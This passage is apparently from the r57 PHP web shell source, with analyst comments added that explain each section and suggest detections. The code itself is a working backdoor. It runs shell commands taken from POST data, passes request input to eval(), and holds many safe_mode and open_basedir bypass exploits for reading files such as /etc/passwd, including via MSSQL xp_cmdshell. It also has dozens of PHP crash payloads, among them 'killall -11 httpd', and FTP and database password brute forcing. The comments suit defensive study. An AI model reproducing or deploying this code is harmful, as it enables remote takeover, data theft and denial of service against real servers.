5082echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
5083
5084if($safe_mode || $open_basedir)
5085
5086{
5087
5088 switch($_POST['cmd'])
5089
5090 {
5091
5092 case 'safe_dir':
5093
5094
5095
5096 if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5097
5098 {
5099
5100 foreach ($d as $file)
5101
5102 {
5103
5104 if ($file=="." || $file=="..") continue;
5105
5106 @clearstatcache();
5107
5108 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5109
5110 if(!$unix){
5111
5112 echo date("d.m.Y H:i",$mtime);
5113
5114 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5115
5116 }
5117
5118 else{
5119
5120 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5121
5122 $owner = @posix_getpwuid($uid);
5123
5124 $grgid = @posix_getgrgid($gid);
5125
5126 }else{$owner['name']=$grgid['name']='';}
5127
5128 echo $inode." ";
5129
5130 echo perms(@fileperms($file));
5131
5132 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5133
5134 echo @date("d.m.Y H:i ",$mtime);
5135
5136 }
5137
5138 echo "$file\n";
5139
5140 }
5141
5142 }
5143
5144
5145
5146 elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5147
5148 {
5149
5150 while (false!==($file=$d->read()))
5151
5152 {
5153
5154 if ($file=="." || $file=="..") continue;
5155
5156 @clearstatcache();
5157
5158 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5159
5160 if(!$unix){
5161
5162 echo date("d.m.Y H:i",$mtime);
5163
5164 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5165
5166 }
5167
5168 else{
5169
5170 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5171
5172 $owner = @posix_getpwuid($uid);
5173
5174 $grgid = @posix_getgrgid($gid);
5175
5176 }else{$owner['name']=$grgid['name']='';}
5177
5178 echo $inode." ";
5179
5180 echo perms(@fileperms($file));
5181
5182 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5183
5184 echo @date("d.m.Y H:i ",$mtime);
5185
5186 }
5187
5188 echo "$file\n";
5189
5190 }
5191
5192 $d->close();
5193
5194 }
5195
5196
5197
5198 elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5199
5200 {
5201
5202 while (false!==($file=@readdir($d)))
5203
5204 {
5205
5206 if ($file=="." || $file=="..") continue;
5207
5208 @clearstatcache();
5209
5210 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5211
5212 if(!$unix){
5213
5214 echo date("d.m.Y H:i",$mtime);
5215
5216 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5217
5218 }
5219
5220 else{
5221
5222 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5223
5224 $owner = @posix_getpwuid($uid);
5225
5226 $grgid = @posix_getgrgid($gid);
5227
5228 }else{$owner['name']=$grgid['name']='';}
5229
5230 echo $inode." ";
5231
5232 echo perms(@fileperms($file));
5233
5234 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5235
5236 echo @date("d.m.Y H:i ",$mtime);
5237
5238 }
5239
5240 echo "$file\n";
5241
5242 }
5243
5244 @closedir($d);
5245
5246 }
5247
5248
5249
5250 elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))
5251
5252 {
5253
5254 echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";
5255
// Analyst note: error handler installed for the glob()-based listing that follows. It matches the
// text of PHP's "SAFE MODE Restriction in effect" warning and stores the second captured group,
// the path named in the warning, in the global list $D at index $c. The technique therefore
// depends on safe_mode warnings being generated, i.e. on legacy PHP releases that still have
// safe_mode.
// Defender view: safe_mode and open_basedir were never a security boundary against code already
// running in the interpreter; isolation belongs at the OS level (separate users, containers,
// filesystem permissions).
5256 function eh($errno, $errstr, $errfile, $errline)
5257
5258 {
5259
5260 global $D, $c, $i;
5261
5262 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
5263
5264 if($o){ $D[$c] = $o[2]; $c++;}
5265
5266 }
5267
5268 $error_reporting = @ini_get('error_reporting');
5269
5270 error_reporting(E_WARNING);
5271
5272 @ini_set("display_errors", 1);
5273
5274 @ini_alter("display_errors", 1);
5275
5276 $root = "/";
5277
5278 if($dir) $root = $dir;
5279
5280 $c = 0; $D = array();
5281
5282 @set_error_handler("eh");
5283
5284 $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
5285
5286 for($i=0; $i < strlen($chars); $i++)
5287
5288 {
5289
5290 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
5291
5292 $prevD = $D[count($D)-1];
5293
5294 @glob($path."*");
5295
5296 if($D[count($D)-1] != $prevD)
5297
5298 {
5299
5300 for($j=0; $j < strlen($chars); $j++)
5301
5302 {
5303
5304 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
5305
5306 $prevD2 = $D[count($D)-1];
5307
5308 @glob($path."*");
5309
5310 if($D[count($D)-1] != $prevD2)
5311
5312 {
5313
5314 for($p=0; $p < strlen($chars); $p++)
5315
5316 {
5317
5318 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
5319
5320 $prevD3 = $D[count($D)-1];
5321
5322 @glob($path."*");
5323
5324 if($D[count($D)-1] != $prevD3)
5325
5326 {
5327
5328 for($r=0; $r < strlen($chars); $r++)
5329
5330 {
5331
5332 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
5333
5334 @glob($path."*");
5335
5336 }
5337
5338 }
5339
5340 }
5341
5342 }
5343
5344 }
5345
5346 }
5347
5348 }
5349
5350 $D = array_unique($D);
5351
5352 foreach($D as $item) echo "{$item}\r\n";
5353
5354 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5355
5356 error_reporting($error_reporting);
5357
5358 }
5359
5360 elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))
5361
5362 {
5363
5364 echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
5365
5366 if(!$dir){$dir='/etc/';};
5367
5368 if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
5369
5370 if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
5371
5372
5373
5374 if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
5375
5376 if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
5377
5378 foreach($presets_rlph as $preset_rlph){
5379
5380 if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
5381
5382 }
5383
5384 for($i=0; $i < strlen($chars_rlph); $i++){
5385
5386 if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
5387
5388 if($n_rlph<=1){continue;};
5389
5390 for($j=0; $j < strlen($chars_rlph); $j++){
5391
5392 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
5393
5394 if($n_rlph<=2){continue;};
5395
5396 for($x=0; $x < strlen($chars_rlph); $x++){
5397
5398 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
5399
5400 if($n_rlph<=3){continue;};
5401
5402 for($y=0; $y < strlen($chars_rlph); $y++){
5403
5404 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
5405
5406 if($n_rlph<=4){continue;};
5407
5408 for($z=0; $z < strlen($chars_rlph); $z++){
5409
5410 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
5411
5412 if($n_rlph<=5){continue;};
5413
5414 for($w=0; $w < strlen($chars_rlph); $w++){
5415
5416 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
5417
5418 }
5419
5420 }
5421
5422 }
5423
5424 }
5425
5426 }
5427
5428 }
5429
5430 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5431
5432 }
5433
5434 else echo $lang[$language.'_text29'];
5435
5436 break;
5437
5438 case 'test1':
5439
5440 $ci = @curl_init("file://".$_POST['test1_file']);
5441
5442 $cf = @curl_exec($ci);
5443
5444 echo htmlspecialchars($cf);
5445
5446 break;
5447
5448 case 'test2':
5449
5450 @include($_POST['test2_file']);
5451
5452 break;
5453
5454 case 'test3':
5455
5456 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
5457
5458 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
5459
5460 if($db)
5461
5462 {
5463
5464 if(@mysql_select_db($_POST['test3_md'],$db))
5465
5466 {
5467
5468 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5469
5470 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
5471
5472/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/
5473
5474 @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
5475
5476 $r = @mysql_query("SELECT * FROM temp_r57_table");
5477
5478 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5479
5480 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5481
5482 }
5483
5484 else echo "[-] ERROR! Can't select database";
5485
5486 @mysql_close($db);
5487
5488 }
5489
5490 else echo "[-] ERROR! Can't connect to mysql server";
5491
5492 break;
5493
5494 case 'test4':
5495
5496 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
5497
5498 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
5499
5500 if($db)
5501
5502 {
5503
5504 if(@mssql_select_db($_POST['test4_md'],$db))
5505
5506 {
5507
5508 @mssql_query("drop table r57_temp_table",$db);
5509
5510 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
5511
5512 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
5513
5514 $res = mssql_query("select * from r57_temp_table",$db);
5515
5516 while(($row=@mssql_fetch_row($res)))
5517
5518 {
5519
5520 echo htmlspecialchars($row[0])."\r\n";
5521
5522 }
5523
5524 @mssql_query("drop table r57_temp_table",$db);
5525
5526 }
5527
5528 else echo "[-] ERROR! Can't select database";
5529
5530 @mssql_close($db);
5531
5532 }
5533
5534 else echo "[-] ERROR! Can't connect to MSSQL server";
5535
5536 break;
5537
5538 case 'test5':
5539
5540 $temp=tempnam($dir, "fname");
5541
5542 if (@file_exists($temp)) @unlink($temp);
5543
5544 $extra = "-C ".$_POST['test5_file']." -X $temp";
5545
5546 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
5547
5548 $str = moreread($temp);
5549
5550 echo htmlspecialchars($str);
5551
5552 @unlink($temp);
5553
5554 break;
5555
5556 case 'test6':
5557
5558 $stream = @imap_open('/etc/passwd', "", "");
5559
5560 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
5561
5562 for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
5563
5564 @imap_close($stream);
5565
5566 break;
5567
5568 case 'test7':
5569
5570 $stream = @imap_open($_POST['test7_file'], "", "");
5571
5572 $str = @imap_body($stream, 1);
5573
5574 echo htmlspecialchars($str);
5575
5576 @imap_close($stream);
5577
5578 break;
5579
5580 case 'test8':
5581
5582 $temp=@tempnam($_POST['test8_file2'], "copytemp");
5583
5584 $str = readzlib($_POST['test8_file1'],$temp);
5585
5586 echo htmlspecialchars($str);
5587
5588 @unlink($temp);
5589
5590 break;
5591
5592 case 'test9':
5593
5594 @ini_restore("safe_mode");
5595
5596 @ini_restore("open_basedir");
5597
5598 $str = moreread($_POST['test9_file']);
5599
5600 echo htmlspecialchars($str);
5601
5602 break;
5603
5604 case 'test10':
5605
5606 @ob_clean();
5607
5608 $error_reporting = @ini_get('error_reporting');
5609
5610 error_reporting(E_ALL ^ E_NOTICE);
5611
5612 @ini_set("display_errors", 1);
5613
5614 @ini_alter("display_errors", 1);
5615
5616 $str=@fopen($_POST['test10_file'],"r");
5617
5618 while(!feof($str)){print htmlspecialchars(fgets($str));}
5619
5620 fclose($str);
5621
5622 error_reporting($error_reporting);
5623
5624 break;
5625
5626 case 'test11':
5627
5628 @ob_clean();
5629
5630 $temp = 'zip://'.$_POST['test11_file'];
5631
5632 $str = moreread($temp);
5633
5634 echo htmlspecialchars($str);
5635
5636 break;
5637
5638 case 'test12':
5639
5640 @ob_clean();
5641
5642 $temp = 'compress.bzip2://'.$_POST['test12_file'];
5643
5644 $str = moreread($temp);
5645
5646 echo htmlspecialchars($str);
5647
5648 break;
5649
5650 case 'test13':
5651
5652 @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
5653
5654 echo $lang[$language.'_text61'];
5655
5656 break;
5657
5658 case 'test14':
5659
5660 @session_save_path($_POST['test14_file2']."\0;$tempdir");
5661
5662 @session_start();
5663
5664 @$_SESSION[php]=$_POST['test14_file1'];
5665
5666 echo $lang[$language.'_text61'];
5667
5668 break;
5669
5670 case 'test15':
5671
5672 @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
5673
5674 echo $lang[$language.'_text61'];
5675
5676 break;
5677
5678 case 'test16':
5679
5680 if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
5681
5682 break;
5683
5684 case 'test17_1':
5685
5686 @unlink('symlinkread');
5687
5688 @symlink('a/a/a/a/a/a/', 'dummy');
5689
5690 @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
5691
5692 @unlink('dummy');
5693
5694 while (1)
5695
5696 {
5697
5698 @symlink('.', 'dummy');
5699
5700 @unlink('dummy');
5701
5702 }
5703
5704 break;
5705
5706 case 'test17_2':
5707
5708 $str='';
5709
5710 while (strlen($str) < 3) {
5711
5712/* $str = moreread('symlinkread');*/
5713
5714 $str = @file_get_contents('symlinkread');
5715
5716 if($str){ @ob_clean(); echo htmlspecialchars($str);}
5717
5718 }
5719
5720 break;
5721
5722 case 'test17_3':
5723
5724 $dir = $files = array();
5725
5726 if(@version_compare(@phpversion(),"5.0.0")>=0){
5727
5728 while (@count($dir) < 3) {
5729
5730 $dir=@scandir('symlinkread');
5731
5732 if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
5733
5734 }
5735
5736 }
5737
5738 else {
5739
5740 while (@count($files) < 3) {
5741
5742 $dh = @opendir('symlinkread');
5743
5744 while (false !== ($filename = @readdir($dh))) {
5745
5746 $files[] = $filename;
5747
5748 }
5749
5750 if(@count($files) > 2){@ob_clean(); @print_r($files); }
5751
5752 }
5753
5754 }
5755
5756 break;
5757
5758 case 'test18':
5759
5760 @putenv("TMPDIR=".$_POST['test18_file2']);
5761
5762 @ini_set("session.save_path", "");
5763
5764 @ini_alter("session.save_path", "");
5765
5766 @session_start();
5767
5768 @$_SESSION[php]=$_POST['test18_file1'];
5769
5770 echo $lang[$language.'_text61'];
5771
5772 break;
5773
5774 case 'test19':
5775
5776 if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }
5777
5778 $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);
5779
5780 if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};
5781
5782 $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
5783
5784 $m->set_local_infile_handler("r");
5785
5786 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5787
5788 $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");
5789
5790 $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");
5791
5792 $r = $m->query("SELECT * FROM temp_r57_table");
5793
5794 while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5795
5796 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5797
5798 $m->close();
5799
5800 break;
5801
5802 }
5803
5804}
5805
5806
5807
// Analyst note: the central command-execution path. Unless safe_mode is on or the value is one of
// the internal pseudo-commands listed in the condition, the request field 'cmd' is handed to ex()
// (helper defined elsewhere; presumably a wrapper around PHP's process-execution functions -
// confirm there) and the output is HTML-escaped into the report textarea.
// Defender view: this is unauthenticated-by-design remote command execution as the web-server
// user. Shell children of the PHP/web-server process, POST bodies carrying a 'cmd' field, and an
// unexpected PHP file in the web root are the primary indicators; disabling process-execution
// functions for the web tier and alerting on process creation by that account reduce exposure.
5808if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
5809
5810 $cmd_rep = ex($_POST['cmd']);
5811
// Non-Unix branch converts the console output between Cyrillic code pages before display.
5812 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5813
5814 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5815
// The block comment opened on the next line disables an alternative safe_mode path (safe_ex).
5816}/*elseif($safe_mode){
5817
5818 $cmd_rep = safe_ex($_POST['cmd']);
5819
5820 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5821
5822 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5823
5824}
5825
5826*/
5827
5828switch($_POST['cmd'])
5829
5830{
5831
5832 case 'dos1':
5833
5834 function a() { a(); } a();
5835
5836 break;
5837
5838 case 'dos2':
5839
5840 @pack("d4294967297", 2);
5841
5842 break;
5843
5844 case 'dos3':
5845
5846 $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
5847
5848 break;
5849
5850 case 'dos4':
5851
5852 $t = array(1);while (1) {$a[] = &$t;};
5853
5854 break;
5855
5856 case 'dos5':
5857
5858 @dl("sqlite.so");$db = new SqliteDatabase("foo");
5859
5860 break;
5861
5862 case 'dos6':
5863
5864 preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
5865
5866 break;
5867
5868 case 'dos7':
5869
5870 @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
5871
5872 break;
5873
5874 case 'dos8':
5875
5876 @shell_exec("killall -11 httpd");
5877
5878 break;
5879
5880 case 'dos9':
5881
5882 function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();
5883
5884 break;
5885
5886 case 'dos10':
5887
5888 $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
5889
5890 break;
5891
5892 case 'dos11':
5893
5894 @array_fill(1,123456789,"Infigo-IS");
5895
5896 break;
5897
5898 case 'dos12':
5899
5900 @substr_compare("A","A",12345678);
5901
5902 break;
5903
5904 case 'dos13':
5905
5906 @unserialize("a:2147483649:{");
5907
5908 break;
5909
5910 case 'dos14':
5911
5912 $Data = @str_ireplace("\n", "<br>", $Data);
5913
5914 break;
5915
5916 case 'dos15':
5917
5918 function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
5919
5920 $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
5921
5922 @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
5923
5924 break;
5925
5926 case 'dos16':
5927
5928 $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
5929
5930 for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
5931
5932 unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
5933
5934 break;
5935
5936 case 'dos17':
5937
5938 $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
5939
5940 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
5941
5942 $x = "AQ ";
5943
5944 unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
5945
5946 break;
5947
5948 case 'dos18':
5949
5950 $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);
5951
5952 if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
5953
5954 echo "Msg not sent because $msg_err\n";
5955
5956 if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
5957
5958 echo "$msg\n";
5959
5960 } else { echo "Received $msg_error fetching message\n"; break; }
5961
5962 @msg_remove_queue ($msg_id);
5963
5964 break;
5965
5966 case 'dos19':
5967
5968 $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
5969
5970 break;
5971
5972 case 'dos20':
5973
5974 $hashtable = str_repeat("A", 39);
5975
5976 $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
5977
5978 $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
5979
5980 $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
5981
5982 for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
5983
5984 $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
5985
5986 @unserialize($str);
5987
5988 break;
5989
5990 case 'dos21':
5991
5992 imagecreatetruecolor(1234,1073741824);
5993
5994 break;
5995
5996 case 'dos22':
5997
5998 imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
5999
6000 break;
6001
6002 case 'dos23':
6003
6004 $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);
6005
6006 break;
6007
6008 case 'dos24':
6009
6010 setlocale(LC_COLLATE, str_repeat("A", 34438013));
6011
6012 break;
6013
6014 case 'dos25':
6015
6016 glob(str_repeat("A", 9638013));
6017
6018 break;
6019
6020 case 'dos26':
6021
6022 glob("a",-1);
6023
6024 break;
6025
6026 case 'dos27':
6027
6028 fnmatch("*[1]e", str_repeat("A", 9638013));
6029
6030 break;
6031
6032 case 'dos28':
6033
6034 if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}
6035
6036 break;
6037
6038 case 'dos29':
6039
6040 if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}
6041
6042 break;
6043
6044 case 'dos30':
6045
6046 $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c);
6047
6048 break;
6049
6050 case 'dos31':
6051
6052 if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}
6053
6054 break;
6055
6056 case 'dos32':
6057
6058 if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}
6059
6060 break;
6061
6062 case 'dos33':
6063
6064 $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);
6065
6066 break;
6067
6068 case 'dos34':
6069
6070 if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}
6071
6072 break;
6073
6074 case 'dos35':
6075
6076 $a = str_repeat("/", 4199000); iconv(1, $a, 1);
6077
6078 break;
6079
6080 case 'dos36':
6081
6082 $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);
6083
6084 break;
6085
6086 case 'dos37':
6087
6088 $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);
6089
6090 break;
6091
6092 case 'dos38':
6093
6094 $a = str_repeat("/", 9791999); iconv_strlen(1, $a);
6095
6096 break;
6097
6098}
6099
6100
6101
// Analyst note: arbitrary PHP execution. For the pseudo-command php_eval the request field of the
// same name has the literal sequences "<?" and "?>" removed and is then passed to eval(); there is
// no other filtering, and '@' suppresses any error output.
// Defender view: eval() fed from request data is one of the most reliable static signatures for
// PHP backdoors, so source scanning of the web root for eval/assert on superglobals, together with
// file-integrity monitoring, is the practical detection; code run this way leaves no file or
// child process of its own.
6102if ($_POST['cmd']=="php_eval"){
6103
6104 $eval = @str_replace("<?","",$_POST['php_eval']);
6105
6106 $eval = @str_replace("?>","",$eval);
6107
6108 @eval($eval);}
6109
6110
6111
// Analyst note: FTP credential guessing against $ftp_server:$ftp_port, both set by the earlier
// preparation block. $users is the candidate list loaded there.
//   brute_method=passwd : each entry is tried as login with the same string as password and, when
//                         'reverse' is posted, with the reversed string as a second attempt.
//   brute_method=dic    : each entry is tried as the password for the fixed login in 'ftp_login'.
// A new connection is opened and closed for every candidate; successes are printed and counted in $suc.
// Defender view: on the targeted FTP service this appears as many short sessions from one source
// with failed logins where the password equals, or is the reverse of, the user name. Login rate
// limits, account lockout, and a ban on passwords derived from the account name defeat it.
6112if ($_POST['cmd']=="ftp_brute")
6113
6114 {
6115
6116 $suc = 0;
6117
6118 if($_POST['brute_method']=='passwd'){
6119
6120 foreach($users as $user)
6121
6122 {
6123
6124 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6125
6126 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
6127
6128 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
6129
6130 @ftp_close($connection);
6131
6132 }
6133
6134 }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
6135
6136 foreach($users as $user)
6137
6138 {
6139
6140 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6141
6142 if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
6143
6144 @ftp_close($connection);
6145
6146 }
6147
6148 }
6149
6150 echo "\r\n-------------------------------------\r\n";
6151
// Summary: the attempt count is the list size, doubled when reversed passwords were also tried.
6152 $count = count($users);
6153
6154 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6155
6156 echo $lang[$language.'_text97'].$count."\r\n";
6157
6158 echo $lang[$language.'_text98'].$suc."\r\n";
6159
6160 }
6161
6162
6163
// Analyst note: database credential guessing, the same scheme as the FTP variant but through the
// my_sql class (defined elsewhere in the file). Target database type, host and port come from the
// request fields 'db', 'db_server' and 'db_port'; $users is the candidate list loaded by the
// earlier preparation block.
//   brute_method=passwd : login == password for every entry, then (with 'reverse') a second pass
//                         with the reversed string as password.
//   brute_method=dic    : fixed login from 'mysql_l', each entry tried as the password.
// Defender view: database logs show runs of failed authentications coming from the web server's
// own address. Limiting which hosts and accounts may connect, enforcing non-trivial passwords on
// service accounts, and alerting on authentication-failure bursts cover this path.
6164if ($_POST['cmd']=="db_brute")
6165
6166 {
6167
6168 $suc = 0;
6169
6170 if($_POST['brute_method']=='passwd'){
6171
6172 foreach($users as $user)
6173
6174 {
6175
// A fresh my_sql object is built for every candidate.
6176 $sql = new my_sql();
6177
6178 $sql->db = $_POST['db'];
6179
6180 $sql->host = $_POST['db_server'];
6181
6182 $sql->port = $_POST['db_port'];
6183
6184 $sql->user = $user;
6185
6186 $sql->pass = $user;
6187
